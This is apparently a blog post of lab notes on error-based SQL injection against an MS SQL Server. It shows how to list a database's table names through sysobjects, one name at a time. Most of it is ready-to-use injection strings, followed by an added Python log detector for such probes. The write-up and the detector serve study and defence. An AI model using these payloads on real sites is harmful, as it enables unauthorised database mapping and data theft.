yuil :: SecOps

[WebSec] Database Scheme Lab - Table


yuil.lee 2025. 10. 21. 17:25
Finding table names

System tables that contain table names
sysobjects
information_schema.tables
information_schema.columns

User tables / system tables
master db

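Methods for finding the names of all tables
- Exclude the table names already found, one at a time
- Compare against the table name already found and step through the names in order
- Use TOP to grow the result set one row at a time and pick out each row by sorting / reverse sorting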
select * from sysobjects

xtype 'U' means a user table.

select name from sysobjects where xtype='u'

select name from camel.dbo.sysobjects where xtype='u'
select name from camel..sysobjects where xtype='u' /* dbo can be omitted */

Table names in the camel db are confirmed.

select * from information_schema.tables

select * from information_schema.tables
where table_type='base table'

select table_name from information_schema.tables
where table_type='base table'

The tables we want to find.

The sysobjects query is shorter.

 

select * from information_schema.columns

select column_name from information_schema.columns
where table_name='member'

select name from sysobjects where xtype='u'

select top 1 name from sysobjects where xtype='u'

select name from sysobjects where xtype='u'

Comparison of the outputs: only the wanted information is returned.

 

webhack
'or (select top 1 name from sysobjects where xtype='u')>0--

Column name 'zipcode' confirmed

select top 1 name from sysobjects 
where xtype='u' and name != 'zipcode'

select name from sysobjects where xtype='u'

board is returned.

# exclude zipcode
'or (select top 1 name from sysobjects where xtype='u' and name!='zipcode')>0--

Column name 'board' is confirmed.

'or (select top 1 name from sysobjects where xtype='u' and name!='zipcode' and name!='board')>0--

dtproperties confirmed

'or (select top 1 name from sysobjects where xtype='u' and name!='zipcode' and name!='board' and name!='dtproperties')>0--

member confirmed

'or (select top 1 name from sysobjects where xtype='u' and name!='zipcode' and name!='board' and name!='dtproperties' and name!='member')>0--

No more errors are raised.

Doing this one name at a time is slow, and the injected string keeps getting longer, which is inconvenient.

 

Comparison operators
select top 1 name from sysobjects
where xtype='u' order by name

select name from sysobjects where xtype='u' order by name

select top 1 name from sysobjects
where xtype='u' and name>'member' order by name

select name from sysobjects where xtype='u' order by name

With order by applied, comparisons between strings follow alphabetical order, so this query works.
'or (select top 1 name from sysobjects where xtype='u' and name>'0' order by name)>0--

board

'or (select top 1 name from sysobjects where xtype='u' and name>'board' order by name)>0--

dtproperties

'or (select top 1 name from sysobjects where xtype='u' and name>'dtproperties' order by name)>0--

member

'or (select top 1 name from sysobjects where xtype='u' and name>'member' order by name)>0--

zipcode

 

Sort / reverse sort
select name from  sysobjects where xtype='u' order by name

select name from  sysobjects where xtype='u' order by name desc

select * from tablename where xtype='u' order by name desc

select top 2 name from sysobjects where xtype='u' order by name desc

select top 1 name
from (select top 1 name from sysobjects where xtype='u' order by name) as vtable
order by name desc

select top 1 name
from (select top 2 name from sysobjects where xtype='u' order by name) as vtable
order by name desc

Changing top 1, 2, 3 in the select statement inside the from clause shows each table in turn.
'or (select top 1 name from (select top 1 name from sysobjects where xtype='u' order by name) as vtable order by name desc)>0--

board

'or (select top 1 name from (select top 2 name from sysobjects where xtype='u' order by name) as vtable order by name desc)>0--

dtproperties

'or (select top 1 name from (select top 3 name from sysobjects where xtype='u' order by name) as vtable order by name desc)>0--

member

'or (select top 1 name from (select top 4 name from sysobjects where xtype='u' order by name) as vtable order by name desc)>0--

zipcode

Once only the same table comes back, the list is complete.
Only the top [number] has to be changed to check each one.
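
All three methods above send a run of requests that each reach a catalog table through a `(select top N ...)` subquery, which leaves a recognizable sequence in web request logs. The following is an added example, not part of the original post, that flags that sequence in a constructed log; the `/login.asp` path, the `id` and `pw` parameter names and the `<ip> <method> <url>` log format are assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qsl, quote_plus, urlsplit

# Catalog objects the page queries to list tables and columns.
CATALOG = re.compile(r"\b(sysobjects|information_schema\s*\.\s*(tables|columns))\b")
# Subquery of the form "(select top N col from ..." used in every payload above.
SUBSELECT = re.compile(r"\(\s*select\s+top\s+\d+\s+\w+\s+from\b")
SQL_COMMENT = re.compile(r"/\*.*?\*/", re.S)

def normalize(value):
    """Lower-case, replace /* */ comments with a space, collapse whitespace."""
    return re.sub(r"\s+", " ", SQL_COMMENT.sub(" ", value.lower())).strip()

def score_request(url):
    """Return the set of indicator names found in the URL's query parameters."""
    hits = set()
    for _, raw in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        value = normalize(raw)  # parse_qsl has already percent-decoded it
        if CATALOG.search(value):
            hits.add("catalog")
        if SUBSELECT.search(value):
            hits.add("subselect_top")
        if "'" in value and value.endswith("--"):
            hits.add("quote_and_comment")
    return hits

def enumeration_sources(log_lines, min_requests=3):
    """Return {client_ip: n} for clients with >= min_requests distinct catalog probes."""
    probes = defaultdict(set)
    for line in log_lines:
        ip, _method, url = line.split(" ", 2)
        if "catalog" in score_request(url):
            probes[ip].add(url)
    return {ip: len(urls) for ip, urls in probes.items() if len(urls) >= min_requests}

def _line(ip, value):
    return f"{ip} GET /login.asp?id={quote_plus(value)}&pw=x"

# Constructed sample log (hypothetical endpoint): payloads from this page plus benign input.
SAMPLE_LOG = [
    _line("203.0.113.7", "'or (select top 1 name from sysobjects where xtype='u')>0--"),
    _line("203.0.113.7", "'or (select top 1 name from sysobjects where xtype='u' and name!='zipcode')>0--"),
    _line("203.0.113.7", "'or (select top 1 name from sysobjects where xtype='u' and name>'board' order by name)>0--"),
    _line("198.51.100.4", "alice"),
    _line("198.51.100.9", "o'brien"),
]

if __name__ == "__main__":
    print(enumeration_sources(SAMPLE_LOG))
```

Counting distinct probing URLs per client, rather than alerting on a single hit, matches the one-name-per-request pattern of the lab and keeps a lone quote in a surname from raising an alert.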